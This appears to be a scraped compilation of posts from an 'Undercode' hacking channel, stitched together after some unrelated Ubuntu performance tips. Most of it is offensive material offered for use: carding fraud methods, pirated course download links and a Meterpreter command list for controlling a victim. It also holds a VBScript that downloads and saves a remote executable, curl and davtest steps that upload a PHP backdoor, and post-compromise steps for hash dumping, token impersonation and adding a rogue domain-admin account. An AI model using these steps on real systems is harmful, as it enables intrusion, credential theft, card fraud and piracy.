5. Use apt-fast instead of apt-get for a speedy update:
apt-fast is a shell script wrapper for “apt-get” that improves updated and package download speed by downloading packages from multiple connections simultaneously. If you frequently use terminal and apt-get to install and update the packages, you may want to give apt-fast a try. Install apt-fast via official PPA using the following commands:

sudo add-apt-repository ppa:apt-fast/stable
sudo apt-get update
sudo apt-get install apt-fast
6. Remove language related ign from apt-get update:
Have you ever noticed the output of sudo apt-get update? There are three kinds of lines in it, hit, ign and get. You can read their meaning here. If you look at IGN lines, you will find that most of them are related to language translation. If you use all the applications, packages in English, there is absolutely no need for a translation of package database from English to English.

If you suppress this language related updates from apt-get, it will slightly increase the apt-get update speed. To do that, open the following file:

sudo gedit /etc/apt/apt.conf.d/00aptitude
And add the following line at the end of this file:

Acquire::Languages "none";
speed up apt get update in Ubuntu
7. Reduce overheating:
Overheating is a common problem in computers these days. An overheated computer runs quite slow. It takes ages to open a program when your CPU fan is running like Usain Bolt. There are two tools which you can use to reduce overheating and thus get a better system performance in Ubuntu, TLP and CPUFREQ.

To install and use TLP, use the following commands in a terminal:

sudo add-apt-repository ppa:linrunner/tlp
sudo apt-get update
sudo apt-get install tlp tlp-rdw
sudo tlp start
You don’t need to do anything after installing TLP. It works in the background.

To install CPUFREQ indicator use the following command:

sudo apt-get install indicator-cpufreq
Restart your computer and use the Powersave mode in it:

CPUFREQ Indicator Applet
8. Tweak LibreOffice to make it faster:
If you are a frequent user of office product, then you may want to tweak the default LibreOffice a bit to make it faster. You will be tweaking memory option here. Open LibreOffice and go to Tools->Options. In there, choose Memory from the left sidebar and enable Systray Quickstarter along with increasing memory allocation.

Improve Libre Office performance
You can read more about how to speed up LibreOffice in detail.

9. Use a lightweight desktop environment (if you can)
If you chose to install the default Unity of GNOME desktop environment, you may choose to opt for a lightweight desktop environment like Xfce or LXDE.

These desktop environments use less RAM and consume less CPU. They also come with their own set of lightweight applications that further helps in running Ubuntu faster. You can refer to this detailed guide to learn how to install Xfce on Ubuntu.

Of course, the desktop might not look as modern as Unity or GNOME. That’s a compromise you have to make.

10. Use lighter alternatives for different applications:
This is more of a suggestion and liking. Some of the default or popular applications are resource heavy and may not be suitable for a low-end computer. What you can do is to use some alternates to these applications. For example, use AppGrid instead of Ubuntu Software Center. Use Gdebi to install packages. Use AbiWord instead of LibreOffice Writer etc.

That concludes the collection of tips to make Ubuntu 18.04, 16.04 and other versions faster. I am sure these tips would provide overall a better system performance.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

10 real tips speedup any linux

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Fake Card Transactions-In Carding :

> This type of fraud accounts for the largest share of payment system losses.

The mechanism of fraud can be different: a fraudster receives a regular card in a bank in a lawful manner, deposits the minimum necessary amount to a special card account. Then he obtains the necessary information about the holder of the plastic card of the same company, but with a more solid account, and enters the new data thus obtained into his card. To implement this method of fraud, the offender must obtain information about the code numbers, surname, name, patronymic of the card holder, sample signature, etc.

🦑There are various ways to fake such a fake:

1) changing the information available on magnetic media;

2) changing the information embossed (squeezed out) on the front side;

3) having done both;

4) having falsified the signature of the legal card holder.

When faking a signature, several options are used, but it takes into account that it is impossible to erase a signature sample, because when you try to do this, the word VOID will appear in the signature field - "invalid". Therefore, it is often simply painted over with white paint.

One of the most dangerous tricks for counterfeiting plastic cards is the production of completely fake cards. The most widely used method of full copying is in some countries in Southeast Asia. This method is most often used by organized criminal groups, which, as a rule, include employees of restaurants and other service establishments. The latter are used to collect information about credit cards that fall into their hands when paying for restaurant and other services.

Credit information used in the manufacture of fake credit cards can be collected in various countries around the world. The most commonly used data are from Canada, the United States of America, European countries, as well as from the Asian region.

written by Undercode
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

✅HOW TO MAKE NETFLIX FROM MYCANAL✅

https://ph.apps2app.com/2020/05/0.html#?o=df4c88b678c64e22b904e1ea8577342116d12b624bc65d4d0956fe6b6040ec2340bb54661629043cce5cbc357451c1ce8fb7f236208e9bdbfad461c8ca8c9a53414c06ccc6a09fc4b2701c3c7ac93901b491efd278fc96ef

HOW TO Open Links Check Here: https://t.me/PremiumHostTuts/3

Share My Channel For More👍😍

➖ @PremiumHostTG ➖

🦑No waste time, Full burpsuite :

 Intro to Web App Testing
 Scoping with Burp
 Mapping with Burp Spider, Intruder, and Engagement Tools  Replacing Some good common methodology tasks
 Automated Scanner Breakdown
 Stealing from other tools and Modifying your Attacks
 Fuzzing with Intruder and FuzzDB
 Auth Bruting with Burp Intruder
 Random Burping, IBurpExtender ++

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Crunch VS Hashcat by Undercode ;

Crunch - a dictionary generator with passwords in which you can define a standard or specified encoding. Crunch can create a list of words with all kinds of combinations and permutations according to the given criteria. The data that crunch displays can be displayed on the screen, saved to a file, or transferred to another program.

This is a very flexible dictionary generation program.

Hashcat is the world's fastest password recovery (cracker). But we are not interested in this function. Hashcat can also generate dictionaries. In order not to crack passwords, but only to show candidates for Hashcat there is an option --stdout

Hashcat uses various methods for generating passwords (by mask, combinatorial, permutation, rule-based attack and others). The most popular way is to generate passwords by mask.

In order not to get confused in terms, we will call the symbol in a certain place of the mask or pattern (pattern) “position”. For example, the first character in the candidates for passwords is the first position. The second character is the second position, etc.

Using a mask, we can gain control over each position.

For example, we want to make one of the positions a static symbol (always the same in all candidates for passwords) - so maybe Crunch. But we can also use custom character sets for certain positions. For example, we know that in the second position there are only numbers from 1, 3, 5. In Hashcat we can create a custom character set that includes the numbers 1, 3, 5 and put this user set in the second position in the mask.

In Crunch there is no concept of “mask”, but there is a concept of “pattern”, “pattern”. In essence, it is equivalent to a mask. Moreover, Crunch can also create up to four custom character sets. Those. in terms of functionality, Crunch is not inferior to the capabilities of Hashcat.

Crunch has a couple of options that are not available in Hashcat. For example, -d allows you to specify the maximum number of duplicate characters. And the -p option creates dictionaries without duplicate characters. Those. This program has its own unique features.

written by Undercode
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑TOR-BOT UPDATED❕

F e a t u r e s

Onion Crawler (.onion).(Completed)
Returns Page title and address with a short description about the site.(Partially Completed)
Save links to database.(PR to be reviewed)
Get emails from site.(Completed)
Save crawl info to JSON file.(Completed)
Crawl custom domains.(Completed)
Check if the link is live.(Completed)
Built-in Updater.(Completed)
TorBot GUI(see branch front_end)
Social Media integration.(not Started) ...(will be updated)

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣Dependencies :

beautifulsoup4
pyinstaller
PySocks
termcolor
requests
requests_mock
yattag

2️⃣GET TOR - TORPROJECT.COM

3️⃣Before you run the torBot make sure the following things are done properly:

> Run tor service sudo service tor start


> Make sure that your torrc is configured to SOCKS_PORT localhost:9050


> CLONE https://github.com/DedSecInside/TorBot then

>Install TorBot Python requirements pip3 install -r requirements.txt

4️⃣On Linux platforms, you can make an executable for TorBot by using the install.sh script. You will need to give the script the correct permissions using chmod +x install.sh Now you can run ./install.sh to create the torBot binary. Run ./torBot to execute the program.

5️⃣An alternative way of running torBot is shown below, along with help instructions.

> python3 torBot.py or use the -h/--help argument

✅git topic
ENJOY❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Operations with stolen or lost cards
#FastTips

The fraudulent use of stolen credit cards remains the most common crime. Methods of counteracting thefts and fraudulent use of plastic cards have been improving for years, however, companies currently prefer to issue inexpensive cards in order to reduce the amount of possible losses from their illegal use. When the amount of losses increases sharply, companies are making efforts to introduce new security measures.

In case of card theft when sending it by mail, the peculiarity of fraud is that the owner does not know about the loss of the card. It is very difficult to prevent theft with this method of fraud.

Criminals have many ways to use stolen cards. Organized criminal groups pay from 100 to 500 US dollars for a stolen card, depending on whether it is signed or not, how long it has been stolen, whether it is on the stolen lists, how long it has been used by the rightful owner, whether the limit has been reached, if there are any additional documents, identity cards.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Courses Collections


Deep Reinforcement Learning: A Hands-on Tutorial in Python [1.48 GB]

https://www.udemy.com/course/deep-reinforcement-learning-a-hands-on-tutorial-in-python/

https://mega.nz/#F!GxtVHayI!wb3gAohVAZO622JeMSHRXA

Visual Studio Code Tutorial - Getting Started With VS Code [4.6 GB]

https://www.udemy.com/course/visual-studio-code-tutorial/

https://mega.nz/#F!lVVH0S5Z!WFhaKyETBuz4tTp9ltzIdg

MCSD 70-483 C# Complete Preparation Course + Practice Exams -3.9 GB-

https://www.udemy.com/course/mcsd-70-483-c-sharp-complete-preparation-course-practice-exams/

https://mega.nz/#F!1INGiAzA!mwuqgGIlzibovFuZ4aGm4w

JUnit 5: Java Unit Tests for Beginners [587 MB]

https://www.udemy.com/course/junit5-for-beginners/

https://mega.nz/#F!QQlUlKQB!8bvQLYGkjM5xRbyuFZ8L_w

Ultimate Neural Nets and Deep Learning Masterclass in Python [872 MB]

https://www.udemy.com/course/neural-nets/

https://mega.nz/#F!1JFSGIRb!LiJ1n2lUJvsc7AhZqRZ5EQ

Start Web Development with GIS Map in JavaScript -879 MB-

https://www.udemy.com/course/start-web-development-with-gis-map-in-javascript/

https://mega.nz/#F!qx5QQILR!ZBaTPewL9wrR_M0QSJZZYg

JavaScript Variables Lifecycles -2.82 GB-

https://mega.nz/#F!MEskgSob!4mUkmta_EoV-REkACQ6eVQ

Angular 8 Masterclass with TypeScript, Firebase, & Material -3.13 GB-

https://www.udemy.com/course/angular-all-you-need-to-know/

https://mega.nz/#F!LoIUkArT!4KoPer_i1KZs-uJug8yvqw

(Some courses from not our uploads)

Support & Share ❤️👍🏻

T.me/UndercodeSecurity

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 SYSTEM COMMANDS :

clearav - clears the event logs on the victim's computer

drop_token - drops a stolen token

execute - executes a command

getpid - gets the current process ID (PID)

getprivs - gets as many privileges as possible

getuid - get the user that the server is running as

kill - terminate the process designated by the PID

ps - list running processes

reboot - reboots the victim computer

reg - interact with the victim's registry

rev2self - calls RevertToSelf() on the victim machine

shell - opens a command shell on the victim machine

shutdown - shuts down the victim's computer

steal_token - attempts to steal the token of a specified (PID) process

sysinfo - gets the details about the victim computer such as OS and name

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to survie inside Kali Linux / Linux in general ?

Set the ip address as a varble
export ip=192.168.1.100 nmap -A -T4 -p- $ip

Netcat port Scanning
nc -nvv -w 1 -z $ip 3388-3390

Discover active IPs usign ARP on the network: arp-scan $ip/24

Discover who else is on the network
netdiscover

Discover IP Mac and Mac vendors from ARP
netdiscover -r $ip/24

Nmap stealth scan using SYN
nmap -sS $ip

Nmap stealth scan using FIN
nmap -sF $ip

Nmap Banner Grabbing
nmap -sV -sT $ip

Nmap OS Fingerprinting
nmap -O $ip

Nmap Regular Scan:
nmap $ip/24

Enumeration Scan
nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt

Enumeration Scan All Ports TCP / UDP and output to a txt file
nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip

Nmap output to a file:
nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24

Quick Scan:
nmap -T4 -F $ip/24

Quick Scan Plus:
nmap -sV -T4 -O -F --version-light $ip/24

Quick traceroute
nmap -sn --traceroute $ip

All TCP and UDP Ports
nmap -v -sU -sS -p- -A -T4 $ip

Intense Scan:
nmap -T4 -A -v $ip

Intense Scan Plus UDP
nmap -sS -sU -T4 -A -v $ip/24

Intense Scan ALL TCP Ports
nmap -p 1-65535 -T4 -A -v $ip/24

Intense Scan - No Ping
nmap -T4 -A -v -Pn $ip/24

Ping scan
nmap -sn $ip/24

Slow Comprehensive Scan
nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24

Scan with Active connect in order to weed out any spoofed ports designed to troll you
nmap -p1-65535 -A -T5 -sT $ip

✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑====== Enumeration ======

DNS Enumeration

NMAP DNS Hostnames Lookup nmap -F --dns-server <dns server ip> <target ip range>

Host Lookup
host -t ns megacorpone.com

Reverse Lookup Brute Force - find domains in the same range
for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"

Perform DNS IP Lookup
dig a domain-name-here.com @nameserver

Perform MX Record Lookup
dig mx domain-name-here.com @nameserver

Perform Zone Transfer with DIG
dig axfr domain-name-here.com @nameserver

DNS Zone Transfers
Windows DNS zone transfer

nslookup -> set type=any -> ls -d blah.com

Linux DNS zone transfer

dig axfr blah.com @ns1.blah.com

Dnsrecon DNS Brute Force
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

Dnsrecon DNS List of megacorp
dnsrecon -d megacorpone.com -t axfr

🦑DNSEnum
dnsenum zonetransfer.me

NMap Enumeration Script List:

NMap Discovery
https://nmap.org/nsedoc/categories/discovery.html

Nmap port version detection MAXIMUM power
nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>

NFS (Network File System) Enumeration

Show Mountable NFS Shares nmap -sV --script=nfs-showmount $ip
RPC (Remote Procedure Call) Enumeration

Connect to an RPC share without a username and password and enumerate privledges rpcclient --user="" --command=enumprivs -N $ip

Connect to an RPC share with a username and enumerate privledges rpcclient --user="<Username>" --command=enumprivs $ip

🦑SMB Enumeration

SMB OS Discovery
nmap $ip --script smb-os-discovery.nse

Nmap port scan
nmap -v -p 139,445 -oG smb.txt $ip-254

Netbios Information Scanning
nbtscan -r $ip/24

Nmap find exposed Netbios servers
nmap -sU --script nbstat.nse -p 137 $ip

🦑Nmap all SMB scripts scan

nmap -sV -Pn -vv -p 445 --script='(smb) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip

Nmap all SMB scripts authenticated scan

nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip


✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑List all SUID files
find / -perm -4000 2>/dev/null

Determine the current version of Linux
cat /etc/issue

Determine more information about the environment
uname -a

List processes running
ps -xaf

List the allowed (and forbidden) commands for the invoking use
sudo -l

List iptables rules
iptables --table nat --list iptables -vL -t filter iptables -vL -t nat iptables -vL -t mangle iptables -vL -t raw iptables -vL -t security


net config Workstation

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

hostname

net users

ipconfig /all

route print

arp -A

netstat -ano

netsh firewall show state

netsh firewall show config

schtasks /query /fo LIST /v

tasklist /SVC

net start



✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Simple Local Web Servers

1️⃣Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80

2️⃣Run a basic Python3 http server, great for serving up shells etc
python3 -m http.server

3️⃣Run a ruby webrick basic http server
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"

4️⃣Run a basic PHP http server
php -S $ip:80

5️⃣Creating a wget VB Script on Windows:
https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt

6️⃣Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):

7️⃣ echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1

echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1

echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
timeout 1

echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
timeout 1

echo xHttp.Open "GET", Url, False >> webdl.vbs
timeout 1

echo xHttp.Send >> webdl.vbs
timeout 1

echo with bStrm >> webdl.vbs
timeout 1

echo .type = 1 ' >> webdl.vbs
timeout 1

echo .open >> webdl.vbs
timeout 1

echo .write xHttp.responseBody >> webdl.vbs
timeout 1

echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs
timeout 1

echo end with >> webdl.vbs
timeout 1
echo

8️⃣The file can be run using the following syntax:

C:\temp\cscript.exe webdl.vbs

Mounting File Shares

Mount NFS share to /mnt/nfs
mount $ip:/vol/share /mnt/nfs
HTTP Put
nmap -p80 $ip --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php


🦑Uploading Files
SCP

1️⃣scp username1@sourcehost:directory1/filename1 username2@destinationhost:directory2/filename2

2️⃣scp localfile username@$ip:~/Folder/

3️⃣scp LinuxExploitSuggester.pl bob@192.168.1.10:~

4️⃣Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor

5️⃣davtest -move -sendbd auto -url http://$ip

https://github.com/cldrn/davtest

6️⃣You can also upload a file using the PUT method with the curl command:

>curl -T 'leetshellz.txt' 'http://$ip'

7️⃣And rename it to an executable file using the MOVE method with the curl command:

> curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'

🦑TFTP
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
EX. FROM WINDOWS HOST:
C:\Users\Offsec>tftp -i $ip get nc.exe

> FTP
apt-get update && apt-get install pure-ftpd

#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/

/etc/init.d/pure-ftpd restart

ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PSK-Crack :

Brute force:

$psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations

no match found for MD5 hash 5c178dSNIP
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)

Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset=

$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking modde
Brute force with 63 chars up to length 5 will take up to 992436543 iterations

----------------------------------------------------------------------------------------------------------------------------------

Dictionary attack:

$psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode

no match found for MD5 hash 5c178dSNIP
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)

--------------------------------------------------------------------------------------------

References: http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Cisco IOS Command Line Cheatsheet
---------------------------------

--- Verify Basic Configuration:

Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc.
SW1# show version

Shows the current configuration file stored in DRAM.
SW1# show running-config

Shows the configuration file stored in NVRAM which is used at first boot process.
SW1# show startup-config

Lists the commands currently held in the history buffer.
SW1# show history

Shows an overview of all interfaces, their physical status, protocol status and ip address if assigned.
SW1# show ip interface brief

Shows detailed information about the specified interface, its status, protocol, duplex, speed, encapsulation, last 5 min traffic.
SW1# show interface vlan 1

Shows the description of all interfaces
SW1# show interfaces description

Shows the status of all interfaces like connected or not, speed, duplex, trunk or access vlan.
SW1# show interfaces status

Shows the public encryption key used for SSH.
SW1# show crypto key mypubkey rsa

Shows information about the leased IP address (when an interface is configured to get IP address via a dhcp server)
SW1# show dhcp lease

Show the router's routing table. List of all networks that the router can reach.
Router# show ip route

--- Router Modes:

Router>: User mode = Limited to basic monitoring commands
Router#: Privileged mode (exec-level mode) = Provides access to all other router commands
Router(config)#: global configuration mode = Commands that affect the entire system
Router(config-if)#: interface mode = Commands that affect interfaces
Router(config-subif)#: subinterface mode = Commands that affect subinterfaces
Router(config-line)#: line mode = Commands that affect in lines modes (console, vty, aux…)
Router(config-router)#: router configuration mode

--- Changing switch hostname:

Switch(config)# hostname SW1

--- Configuring passwords:

SW1(config)# enable secret cisco ! MD5 hash
SW1(config)# enable password notcisco ! Clear text

--- Securing console port:

SW1(config)# line con 0
SW1(config-line)# password cisco
SW1(config-line)# login

--- Securing terminal lines:

SW1(config)# line vty 0 4
SW1(config-line)# password cisco
SW1(config-line)# login

--- Encrypting passwords:

SW1(config)# service password-encryption

--- Configuring banners:

SW1(config)# banner motd $
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
UNAUTHORIZED ACCESS IS PROHIBITED
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
$

--- Giving the switch an IP address:

SW1(config)# interface vlan 1
SW1(config-if)# ip address 172.16.1.11 255.255.255.0 ! or DHCP
SW1(config-if)# no shutdown

--- Setting the default gateway:

SW1(config)# ip default-gateway 172.16.1.1

--- Saving configuration:

SW1# copy running-config startup-config
Destination filename startup-config? ! Press enter to confirm file name.
Building configuration…
OK

! Short for write memory.
SW1# wr
Building configuration…
OK

ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑[+] After compromising a Windows machine:

[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain

[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE

[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts 10.10.10.0/24
msf > set threads 8
msf > run

msf> spool off

[>] Compromise Admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
meterpreter > shell

C:\> whoami
mydom\adaministrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain

ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁